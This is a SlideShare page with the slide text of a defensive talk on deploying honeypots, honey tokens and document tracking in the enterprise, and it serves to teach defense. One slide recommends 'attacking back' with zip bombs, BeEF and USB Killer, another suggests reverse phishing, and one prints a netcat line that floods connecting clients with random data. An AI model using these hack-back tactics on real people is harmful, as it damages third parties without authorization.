SlideShare a Scribd company logo

Honeypots for Active Defense

Greg Foss, profile picture
Greg Foss

This document presents a practical guide on using honeypots for active defense within enterprise security, emphasizing the importance of understanding attacker behavior. It covers various types of honeypots, including no interaction, low interaction, medium interaction, and high interaction, detailing their setup and use cases. Additionally, the document discusses active defense strategies such as gathering intelligence, automating responses, and the significance of maintaining baseline security controls before implementing honeypots.

Technology
Related topics:
Blue Team
1 of 71
Downloaded 154 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
Honeypots for Active Defense A Practical Guide to Honeynets within the Enterprise Greg Foss SecOps Lead / Senior Researcher @heinzarelli
# whoami Greg Foss SecOps Team Lead Sr. Security Research Engineer OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, CYBER APT
Traditional Defensive Concepts • Maintain a tough perimeter • Implement layered security controls • Block known attacks and ban malicious IP’s • Create and enforce policy to discourage misuse
…cross our fingers
InfoSec Realities • There is no magic security product that will protect you or your company. Period. • It’s when, not if — there’s always a way in…
Not Just ‘APTs’
Active Defense
What is ‘Active Defense’ • All comes down to tipping the odds in our favor as defenders… • Annoying the attacker • Trapping them and wasting time • Gather data + attempt attribution • ‘Attacking Back’ • Reduce the MTTD and MTTR • MTTD => Mean-Time-to-Detect • MTTR => Mean-Time-to-Respond
Honeypots for Active Defense
Why Internal Honeypots? • Easy to configure, deploy, and maintain • Fly traps for anomalous activity • They don’t even need to look legit once breached… Just enough to raise a flag. • You will learn a ton about your adversaries. Information that will help in the future… • *Honeypots are something to focus on after the basics have been taken care of.
Honeypot Use Cases • Research • Understand how attackers think, what works, what doesn’t, and what they are after. • Defense • Learn from the adversary and adapt… Lay traps to catch subtle yet abnormal activities.
Defense
VM’s ADHD http://sourceforge.net/projects/adhd/ Honey Drive 3 http://sourceforge.net/projects/honeydrive/
First things first… • Honeypots and Active Defense come after baseline security controls are in place. • Warning banners are critical and assist in the event prosecution is necessary / desired.
Types of Honeypots No Interaction Low Interaction Medium Interaction High Interaction Honey Tokens / Drives / Strings / Etc. *note - this is my interpretation, not necessarily ‘industry standard’
No Interaction Honeypots Primarily referred to as Honeyports, or services that simply log and/or ban on full TCP connect.
‘No Interaction’ Honeypots • Basic Honeyports • Linux - NetCat and IPTables • Windows - NetCat and Netsh • Python and PowerShell options as well…
Windows PowerShell Honeyports
Windows PowerShell Honeyports
Linux Honeyports • Artillery — supports Windows too! • https://www.trustedsec.com/downloads/artillery/
Artillery Logging • Port Scanning and/or Illegitimate Service Access • Local Syslog, Flat File, or Remote Syslog options • IP’s are added to the banlist and blocked locally via IPTables
Artillery Logging Bonus! • File Integrity Monitoring
Honeypots for Active Defense
Low Interaction Honeypots Honeypots that serve up basic content and are not interactive once breached.
WordPot • https://github.com/gbrindisi/wordpot • Fake WordPress app, written in Python…
Fake PhpMyAdmin • https://github.com/gfoss/phpmyadmin_honeypot • Simple fake phpmyadmin ‘app’ that logs to flat files. This same approach can be applied to anything…
$any fake login panel • Custom - but believable and hidden from normal users • Can be used in ‘reverse phishing’ — discussing later…
$any fake login panel • Logging attacker data is standard, what if you need evidence that is a bit more tangible…
Honeybadger • https://bitbucket.org/LaNMaSteR53/honeybadger/ • Gain *true attribution on your adversaries…
Honeypots for Active Defense
Medium Interaction Honeypots Interactive honeypots that resemble real services and provide limited functionality once breached.
Medium Interaction Honeypots • TONS! But one of my favorites: • https://github.com/desaster/kippo • https://github.com/gfoss/kippo • Simulate SSH Service…
Kippo • Python script which simulates an SSH service that is highly customizable, portable, and adaptable. • Logs to flat files and stores the full TTY session for each connection, so that attacks can be replayed in real-time. • One of the more popular honeypots out there, as a result, attackers know how to differentiate between this and a real Linux host very quickly. Be cautious… • When deploying externally, there is a risk of CnC’s maintaining persistent connections. • Can be used as a pentest tool as well :-)
Honeypots for Active Defense
Kippo Alert Automation https://github.com/gfoss/kippo/blob/master/replay-alert.sh
High Interaction Honeypots Imitate real systems or modify real hosts to act as honeypots in order to verbosely log attacker activity and capture all network and related flow data.
Honeypots for Active Defense
Analysis Tools • LogRhythm Network Monitor and SIEM • Suricata IDS • http://suricata-ids.org/download/ • BRO IDS • https://www.bro.org/ • Cuckoo Sandbox • http://www.cuckoosandbox.org/
Routers and Switches • ROMAN Hunter - Router Man Hunter • http://sourceforge.net/projects/romanhunter/ • Configure real AP as a honeypot • Capture MAC of 
 attacker that 
 bypasses 
 security • Correlate the MAC and
 add it to an
 organizational blacklist…
High Interaction Warning! • Deploying real systems / devices / services is dangerous and requires dedicated monitoring. • Whenever hosts can actually be compromised there is huge risk if not monitored appropriately. • Never use the organization’s gold-standard image for the honeypot. • Segment these hosts from the production network!
Honey Tokens and Document Bugging Tracking file access, modification, exfiltration, etc…
File Integrity Monitoring
Honey Tokens • Use file integrity monitoring to track all interactions with files/folders/etc of interest. Great for network shares. • Not just files, this can be strings, drives, directories, etc. • Any predefined item that
 will generate a log when 
 accessed/modified/etc. • Trivial to configure…
Document Bugging • WebBug How To: • http://ha.ckers.org/webbug.html
 • WebBug Server: • https://bitbucket.org/ethanr/webbugserver
 • Bugged Files - Is your Document Telling on You? • Daniel Crowley + Damon Smith • https://www.youtube.com/watch?v=co1gFikKLpA
Document Tracking • Same tricks used by Marketing for years, normally for tracking emails. • Why loading external
 images within email
 is risky…
Document Tracking • Documents can be tracked in the same way as email / web. • Automating the process… • https://github.com/gfoss/misc/tree/master/Bash/webbug
Document Tracking Issues • If the document is opened up offline it will divulge information about the tracking service. • *There is no telling how someone will react once it is discovered that they were being tracked…
Screwing with Attackers • Reverse Phishing and ‘Attacking Back’ • A
 case
 study…
Honeypots for Active Defense
Honeypots for Active Defense
Honeypots for Active Defense
Honeypots for Active Defense
Honeypots for Active Defense
Honeypots for Active Defense
Honeypots for Active Defense
Honeypots for Active Defense
• Zip Bombs • http://unforgettable.dk - 42.zip • BeEF - Browser Exploitation Framework • http://beefproject.com/ • USB Killer • http://kukuruku.co/hub/diy/usb-killer • Clippy! • http://www.irongeek.com/i.php?page=security/ phpids-install-notes More Tricks
cat /dev/random | nc -nl 22
https://github.com/nitram509/ascii-telnet-server ASCII Art Distraction
Monitoring • Dedicated SOC - Security Operations Center • SIEM - Security Information Event Management • Correlate and Track Events • Evaluate Impact on the Real Environment • Measure Risk and Actively Respond to Threats • IDS, Network Flow Analysis, Firewalls, etc. • Configure once and it’s smooth sailing from there…
Enterprise Threat Intelligence • Develop Context-Aware Threat Intelligence • Leverage knowledge gained from attackers to create IOC’s and custom IDS and SIEM rules…
Event Correlation
Automating Response • Dynamic Honeypotting • Deploy PowerShell and Command Line Logging • http://www.slideshare.net/Hackerhurricane/ask- aalware-archaeologist/25
Automating Response • Google Rapid Response - GRR • https://github.com/google/grr • Netflix FIDO • https://github.com/Netflix/Fido • Kansa • https://github.com/davehull/Kansa • Power Forensics • https://github.com/Invoke-IR/PowerForensics
1 PowerShell Script Live Data Acquisition and Incident Response Integrates into Existing Security Processes Remote Forensic Acquisition Host and User Lockdown https://github.com/gfoss/PSRecon/
Honeypots for Active Defense
Bringing it all together…
Honeypot Dashboards • HoneyDrive3 comes complete with dashboards and enhancement scripts to display interesting data. • Kippo Graph • http://bruteforce.gr/kippo-graph • The Modern Honey Network - can also deploy! • https://threatstream.com/blog/mhn-modern- honey-network • LogRhythm SIEM - Honeypot Analytics Suite
Honeypots for Active Defense
Works Cited & Recommended Reading • Strand, John, and Asadoorian, Paul. Offensive Countermeasures: The Art of Active Defense. 2013. • Murdoch, D. W. Blue Team Handbook: Incident Response Edition: A Condensed Field Guide for the Cyber Security Incident Responder. United States: CreateSpace Independent, 2014. • Chuvakin, Anton, and Kevin Schmidt. Logging and Log Management: The Authoritative Guide to Dealing with Syslog, Audit Logs, Events, Alerts and Other IT 'noise' Rockland, MA: Syngress, 2012. • Bodmer, Sean. Reverse Deception: Organized Cyber Threat Counter-exploitation. N.p.: n.p., n.d. Print.
Thank You! Questions? https://github.com/gfoss/ Greg Foss
 OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
 SecOps Lead / Sr. Researcher
 greg.foss[at]LogRhythm.com
 @heinzarelli

More Related Content

PPTX
honey pots introduction and its types
Vishal Tandel
 
PPTX
Honeypots (Ravindra Singh Rathore)
Ravindra Singh Rathore
 
PPT
All about Honeypots & Honeynets
Mehdi Poustchi Amin
 
PDF
[제3회 지원주택 컨퍼런스] 세션1_김미옥_발달장애인의 '탈시설 모델' 개발을 위한 종단연구: 지원생활모델의 적응과 함의(2...
C.
 
PPTX
Threat Modeling Lessons From Star Wars
Adam Shostack
 
PDF
Intro to open source observability with grafana, prometheus, loki, and tempo(...
LibbySchulze
 
PPTX
Docker Kubernetes Istio
Araf Karsh Hamid
 
PPTX
Hive on Spark の設計指針を読んでみた
Recruit Technologies
 
honey pots introduction and its types
Vishal Tandel
 
Honeypots (Ravindra Singh Rathore)
Ravindra Singh Rathore
 
All about Honeypots & Honeynets
Mehdi Poustchi Amin
 
[제3회 지원주택 컨퍼런스] 세션1_김미옥_발달장애인의 '탈시설 모델' 개발을 위한 종단연구: 지원생활모델의 적응과 함의(2...
C.
 
Threat Modeling Lessons From Star Wars
Adam Shostack
 
Intro to open source observability with grafana, prometheus, loki, and tempo(...
LibbySchulze
 
Docker Kubernetes Istio
Araf Karsh Hamid
 
Hive on Spark の設計指針を読んでみた
Recruit Technologies
 

What's hot (20)

PDF
Achieving CI/CD with Kubernetes
Ramit Surana
 
PPTX
Deploying, Managing, and Leveraging Honeypots in the Enterprise using Open So...
Jason Trost
 
PDF
Comparison of Current Service Mesh Architectures
Mirantis
 
PDF
Open shift 4 infra deep dive
Winton Winton
 
PDF
An Introduction to Kubernetes
Imesh Gunaratne
 
PDF
Deploying OpenStack Object Storage (Swift)
Juan José Martínez
 
PDF
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
PDF
Container Security Deep Dive & Kubernetes
Aqua Security
 
PPTX
Building an Empire with PowerShell
Will Schroeder
 
PDF
seL4 intro
microkerneldude
 
PPTX
Kubernetes Introduction
Martin Danielsson
 
PPTX
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Andy Robbins
 
PDF
stackconf 2022: Open Source for Better Observability
NETWAYS
 
PPTX
IBM Cloud Manager with OpenStack Overview
Patrick Bouillaud
 
PDF
Kubernetes and Prometheus
Weaveworks
 
PDF
Super Easy Memory Forensics
IIJ
 
PPTX
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
PPTX
BigtopでHadoopをビルドする(Open Source Conference 2021 Online/Spring 発表資料)
NTT DATA Technology & Innovation
 
PDF
OpenStack Neutron Tutorial
mestery
 
PDF
Sharpening your Threat-Hunting Program with ATTACK Framework
MITRE - ATT&CKcon
 
Achieving CI/CD with Kubernetes
Ramit Surana
 
Deploying, Managing, and Leveraging Honeypots in the Enterprise using Open So...
Jason Trost
 
Comparison of Current Service Mesh Architectures
Mirantis
 
Open shift 4 infra deep dive
Winton Winton
 
An Introduction to Kubernetes
Imesh Gunaratne
 
Deploying OpenStack Object Storage (Swift)
Juan José Martínez
 
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Container Security Deep Dive & Kubernetes
Aqua Security
 
Building an Empire with PowerShell
Will Schroeder
 
seL4 intro
microkerneldude
 
Kubernetes Introduction
Martin Danielsson
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Andy Robbins
 
stackconf 2022: Open Source for Better Observability
NETWAYS
 
IBM Cloud Manager with OpenStack Overview
Patrick Bouillaud
 
Kubernetes and Prometheus
Weaveworks
 
Super Easy Memory Forensics
IIJ
 
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
BigtopでHadoopをビルドする(Open Source Conference 2021 Online/Spring 発表資料)
NTT DATA Technology & Innovation
 
OpenStack Neutron Tutorial
mestery
 
Sharpening your Threat-Hunting Program with ATTACK Framework
MITRE - ATT&CKcon
 
Ad

Viewers also liked (20)

PPT
Honeypots
Jayant Gandhi
 
PPT
Honeypot-A Brief Overview
SILPI ROSAN
 
PPTX
Honeypot
Sushan Sharma
 
PPT
Honeypot honeynet
Sina Manavi
 
DOC
Honeypot seminar report
Inder NeGi
 
PPTX
Honeypot ppt1
samrat saurabh
 
PPT
Honey Pot
iradarji
 
PPT
Honeypots
J. Scott Christianson
 
PDF
0x3E9 Ways To DIE
ynvb
 
PDF
SecureSet WarGames - Logging and Packet Capture Training
Greg Foss
 
PDF
Threat Intelligence Field of Dreams
Greg Foss
 
PDF
DerbyCon 5 - Tactical Diversion-Driven Defense
Greg Foss
 
PDF
Deception Driven Defense - Infragard 2016
Greg Foss
 
PDF
Honeypots for Network Security
Kirubaburi R
 
PPTX
Interactive presentation screen format 16-9 - minimal for slideshare
Patrick Keyzer
 
PDF
Honeypots
aelouanzi
 
PPT
Lecture 7
Education
 
PDF
CDE future sonar webinar
Defence and Security Accelerator
 
PPT
Honeypot Project
Manikyala Rao
 
PPT
Ppt
Shiva Krishna Chandra Shekar
 
Honeypots
Jayant Gandhi
 
Honeypot-A Brief Overview
SILPI ROSAN
 
Honeypot
Sushan Sharma
 
Honeypot honeynet
Sina Manavi
 
Honeypot seminar report
Inder NeGi
 
Honeypot ppt1
samrat saurabh
 
Honey Pot
iradarji
 
Honeypots
J. Scott Christianson
 
0x3E9 Ways To DIE
ynvb
 
SecureSet WarGames - Logging and Packet Capture Training
Greg Foss
 
Threat Intelligence Field of Dreams
Greg Foss
 
DerbyCon 5 - Tactical Diversion-Driven Defense
Greg Foss
 
Deception Driven Defense - Infragard 2016
Greg Foss
 
Honeypots for Network Security
Kirubaburi R
 
Interactive presentation screen format 16-9 - minimal for slideshare
Patrick Keyzer
 
Honeypots
aelouanzi
 
Lecture 7
Education
 
CDE future sonar webinar
Defence and Security Accelerator
 
Honeypot Project
Manikyala Rao
 
Ppt
Shiva Krishna Chandra Shekar
 
Ad

Similar to Honeypots for Active Defense (20)

PDF
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
PROIDEA
 
PPT
Anton Chuvakin on Honeypots
Anton Chuvakin
 
PPT
honeypots.ppt
DetSersi
 
PDF
Having Honeypot for Better Network Security Analysis
Bangladesh Network Operators Group
 
PPTX
Honeypots.ppt1800363876
Momita Sharma
 
PPT
Using Canary Honeypots for Network Security Monitoring
chrissanders88
 
PPTX
Raising the dead to save the living
JaredPeck
 
PPT
Honeypot
Akhil Sahajan
 
PPT
Honeypot
Akhil Sahajan
 
PPT
Honey pots
Dhaivat Zala
 
PPTX
Honeypots and honeynets
Rasool Irfan
 
PDF
Honeypot 101 (slide share)
Emil Tan
 
PDF
Talk28oct14
mjos
 
PDF
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
APNIC
 
PPT
Honeypot
KirtiGoyal25
 
PDF
Honeypotdeploy Ieee2005
seguridadutpl
 
PDF
Adversary Pattern Analysis - A Journey with APNIC Honeypot
A. S. M. Shamim Reza
 
PPTX
Red Team Apocalypse
Beau Bullock
 
PPTX
Honeypots for Cloud Providers - SDN World Congress
Vallie Joseph
 
PPTX
BSA2016 - Honeypots for Network Security Monitoring
chrissanders88
 
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
PROIDEA
 
Anton Chuvakin on Honeypots
Anton Chuvakin
 
honeypots.ppt
DetSersi
 
Having Honeypot for Better Network Security Analysis
Bangladesh Network Operators Group
 
Honeypots.ppt1800363876
Momita Sharma
 
Using Canary Honeypots for Network Security Monitoring
chrissanders88
 
Raising the dead to save the living
JaredPeck
 
Honeypot
Akhil Sahajan
 
Honeypot
Akhil Sahajan
 
Honey pots
Dhaivat Zala
 
Honeypots and honeynets
Rasool Irfan
 
Honeypot 101 (slide share)
Emil Tan
 
Talk28oct14
mjos
 
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
APNIC
 
Honeypot
KirtiGoyal25
 
Honeypotdeploy Ieee2005
seguridadutpl
 
Adversary Pattern Analysis - A Journey with APNIC Honeypot
A. S. M. Shamim Reza
 
Red Team Apocalypse
Beau Bullock
 
Honeypots for Cloud Providers - SDN World Congress
Vallie Joseph
 
BSA2016 - Honeypots for Network Security Monitoring
chrissanders88
 

More from Greg Foss (11)

PPTX
Cloud Crime Ops
Greg Foss
 
PPTX
Future of Destructive Malware
Greg Foss
 
PDF
Crypto Hacks - Quit your Job and Become a Crypto Farmer
Greg Foss
 
PDF
PIE - BSides Vancouver 2018
Greg Foss
 
PDF
Phishing Intelligence Engine - BlueHat v17
Greg Foss
 
PDF
Security Automation and Orchestration
Greg Foss
 
PDF
Activated Charcoal - Making Sense of Endpoint Data
Greg Foss
 
PDF
Advanced Threats and Lateral Movement Detection
Greg Foss
 
PDF
Wi-Fi Hotspot Attacks
Greg Foss
 
PDF
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
PDF
Attacking Drupal
Greg Foss
 
Cloud Crime Ops
Greg Foss
 
Future of Destructive Malware
Greg Foss
 
Crypto Hacks - Quit your Job and Become a Crypto Farmer
Greg Foss
 
PIE - BSides Vancouver 2018
Greg Foss
 
Phishing Intelligence Engine - BlueHat v17
Greg Foss
 
Security Automation and Orchestration
Greg Foss
 
Activated Charcoal - Making Sense of Endpoint Data
Greg Foss
 
Advanced Threats and Lateral Movement Detection
Greg Foss
 
Wi-Fi Hotspot Attacks
Greg Foss
 
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
Attacking Drupal
Greg Foss
 

Recently uploaded (20)

PDF
Approach and Philosophy of On baking technology
30anthuong17
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PPTX
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
23bcla24
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
KodekX | Application Modernization Development
KodekX
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Approach and Philosophy of On baking technology
30anthuong17
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
23bcla24
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
KodekX | Application Modernization Development
KodekX
 
Teaching material agriculture food technology
LiaRayya
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 

Honeypots for Active Defense

  • 1. Honeypots for Active Defense A Practical Guide to Honeynets within the Enterprise Greg Foss SecOps Lead / Senior Researcher @heinzarelli
  • 2. # whoami Greg Foss SecOps Team Lead Sr. Security Research Engineer OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, CYBER APT
  • 3. Traditional Defensive Concepts • Maintain a tough perimeter • Implement layered security controls • Block known attacks and ban malicious IP’s • Create and enforce policy to discourage misuse
  • 5. InfoSec Realities • There is no magic security product that will protect you or your company. Period. • It’s when, not if — there’s always a way in…
  • 8. What is ‘Active Defense’ • All comes down to tipping the odds in our favor as defenders… • Annoying the attacker • Trapping them and wasting time • Gather data + attempt attribution • ‘Attacking Back’ • Reduce the MTTD and MTTR • MTTD => Mean-Time-to-Detect • MTTR => Mean-Time-to-Respond
  • 10. Why Internal Honeypots? • Easy to configure, deploy, and maintain • Fly traps for anomalous activity • They don’t even need to look legit once breached… Just enough to raise a flag. • You will learn a ton about your adversaries. Information that will help in the future… • *Honeypots are something to focus on after the basics have been taken care of.
  • 11. Honeypot Use Cases • Research • Understand how attackers think, what works, what doesn’t, and what they are after. • Defense • Learn from the adversary and adapt… Lay traps to catch subtle yet abnormal activities.
  • 14. First things first… • Honeypots and Active Defense come after baseline security controls are in place. • Warning banners are critical and assist in the event prosecution is necessary / desired.
  • 15. Types of Honeypots No Interaction Low Interaction Medium Interaction High Interaction Honey Tokens / Drives / Strings / Etc. *note - this is my interpretation, not necessarily ‘industry standard’
  • 16. No Interaction Honeypots Primarily referred to as Honeyports, or services that simply log and/or ban on full TCP connect.
  • 17. ‘No Interaction’ Honeypots • Basic Honeyports • Linux - NetCat and IPTables • Windows - NetCat and Netsh • Python and PowerShell options as well…
  • 20. Linux Honeyports • Artillery — supports Windows too! • https://www.trustedsec.com/downloads/artillery/
  • 21. Artillery Logging • Port Scanning and/or Illegitimate Service Access • Local Syslog, Flat File, or Remote Syslog options • IP’s are added to the banlist and blocked locally via IPTables
  • 22. Artillery Logging Bonus! • File Integrity Monitoring
  • 24. Low Interaction Honeypots Honeypots that serve up basic content and are not interactive once breached.
  • 26. Fake PhpMyAdmin • https://github.com/gfoss/phpmyadmin_honeypot • Simple fake phpmyadmin ‘app’ that logs to flat files. This same approach can be applied to anything…
  • 27. $any fake login panel • Custom - but believable and hidden from normal users • Can be used in ‘reverse phishing’ — discussing later…
  • 28. $any fake login panel • Logging attacker data is standard, what if you need evidence that is a bit more tangible…
  • 31. Medium Interaction Honeypots Interactive honeypots that resemble real services and provide limited functionality once breached.
  • 32. Medium Interaction Honeypots • TONS! But one of my favorites: • https://github.com/desaster/kippo • https://github.com/gfoss/kippo • Simulate SSH Service…
  • 33. Kippo • Python script which simulates an SSH service that is highly customizable, portable, and adaptable. • Logs to flat files and stores the full TTY session for each connection, so that attacks can be replayed in real-time. • One of the more popular honeypots out there, as a result, attackers know how to differentiate between this and a real Linux host very quickly. Be cautious… • When deploying externally, there is a risk of CnC’s maintaining persistent connections. • Can be used as a pentest tool as well :-)
  • 36. High Interaction Honeypots Imitate real systems or modify real hosts to act as honeypots in order to verbosely log attacker activity and capture all network and related flow data.
  • 38. Analysis Tools • LogRhythm Network Monitor and SIEM • Suricata IDS • http://suricata-ids.org/download/ • BRO IDS • https://www.bro.org/ • Cuckoo Sandbox • http://www.cuckoosandbox.org/
  • 39. Routers and Switches • ROMAN Hunter - Router Man Hunter • http://sourceforge.net/projects/romanhunter/ • Configure real AP as a honeypot • Capture MAC of 
 attacker that 
 bypasses 
 security • Correlate the MAC and
 add it to an
 organizational blacklist…
  • 40. High Interaction Warning! • Deploying real systems / devices / services is dangerous and requires dedicated monitoring. • Whenever hosts can actually be compromised there is huge risk if not monitored appropriately. • Never use the organization’s gold-standard image for the honeypot. • Segment these hosts from the production network!
  • 41. Honey Tokens and Document Bugging Tracking file access, modification, exfiltration, etc…
  • 43. Honey Tokens • Use file integrity monitoring to track all interactions with files/folders/etc of interest. Great for network shares. • Not just files, this can be strings, drives, directories, etc. • Any predefined item that
 will generate a log when 
 accessed/modified/etc. • Trivial to configure…
  • 44. Document Bugging • WebBug How To: • http://ha.ckers.org/webbug.html
 • WebBug Server: • https://bitbucket.org/ethanr/webbugserver
 • Bugged Files - Is your Document Telling on You? • Daniel Crowley + Damon Smith • https://www.youtube.com/watch?v=co1gFikKLpA
  • 45. Document Tracking • Same tricks used by Marketing for years, normally for tracking emails. • Why loading external
 images within email
 is risky…
  • 46. Document Tracking • Documents can be tracked in the same way as email / web. • Automating the process… • https://github.com/gfoss/misc/tree/master/Bash/webbug
  • 47. Document Tracking Issues • If the document is opened up offline it will divulge information about the tracking service. • *There is no telling how someone will react once it is discovered that they were being tracked…
  • 48. Screwing with Attackers • Reverse Phishing and ‘Attacking Back’ • A
 case
 study…
  • 57. • Zip Bombs • http://unforgettable.dk - 42.zip • BeEF - Browser Exploitation Framework • http://beefproject.com/ • USB Killer • http://kukuruku.co/hub/diy/usb-killer • Clippy! • http://www.irongeek.com/i.php?page=security/ phpids-install-notes More Tricks
  • 58. cat /dev/random | nc -nl 22
  • 60. Monitoring • Dedicated SOC - Security Operations Center • SIEM - Security Information Event Management • Correlate and Track Events • Evaluate Impact on the Real Environment • Measure Risk and Actively Respond to Threats • IDS, Network Flow Analysis, Firewalls, etc. • Configure once and it’s smooth sailing from there…
  • 61. Enterprise Threat Intelligence • Develop Context-Aware Threat Intelligence • Leverage knowledge gained from attackers to create IOC’s and custom IDS and SIEM rules…
  • 63. Automating Response • Dynamic Honeypotting • Deploy PowerShell and Command Line Logging • http://www.slideshare.net/Hackerhurricane/ask- aalware-archaeologist/25
  • 64. Automating Response • Google Rapid Response - GRR • https://github.com/google/grr • Netflix FIDO • https://github.com/Netflix/Fido • Kansa • https://github.com/davehull/Kansa • Power Forensics • https://github.com/Invoke-IR/PowerForensics
  • 65. 1 PowerShell Script Live Data Acquisition and Incident Response Integrates into Existing Security Processes Remote Forensic Acquisition Host and User Lockdown https://github.com/gfoss/PSRecon/
  • 68. Honeypot Dashboards • HoneyDrive3 comes complete with dashboards and enhancement scripts to display interesting data. • Kippo Graph • http://bruteforce.gr/kippo-graph • The Modern Honey Network - can also deploy! • https://threatstream.com/blog/mhn-modern- honey-network • LogRhythm SIEM - Honeypot Analytics Suite
  • 70. Works Cited & Recommended Reading • Strand, John, and Asadoorian, Paul. Offensive Countermeasures: The Art of Active Defense. 2013. • Murdoch, D. W. Blue Team Handbook: Incident Response Edition: A Condensed Field Guide for the Cyber Security Incident Responder. United States: CreateSpace Independent, 2014. • Chuvakin, Anton, and Kevin Schmidt. Logging and Log Management: The Authoritative Guide to Dealing with Syslog, Audit Logs, Events, Alerts and Other IT 'noise' Rockland, MA: Syngress, 2012. • Bodmer, Sean. Reverse Deception: Organized Cyber Threat Counter-exploitation. N.p.: n.p., n.d. Print.
  • 71. Thank You! Questions? https://github.com/gfoss/ Greg Foss
 OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
 SecOps Lead / Sr. Researcher
 greg.foss[at]LogRhythm.com
 @heinzarelli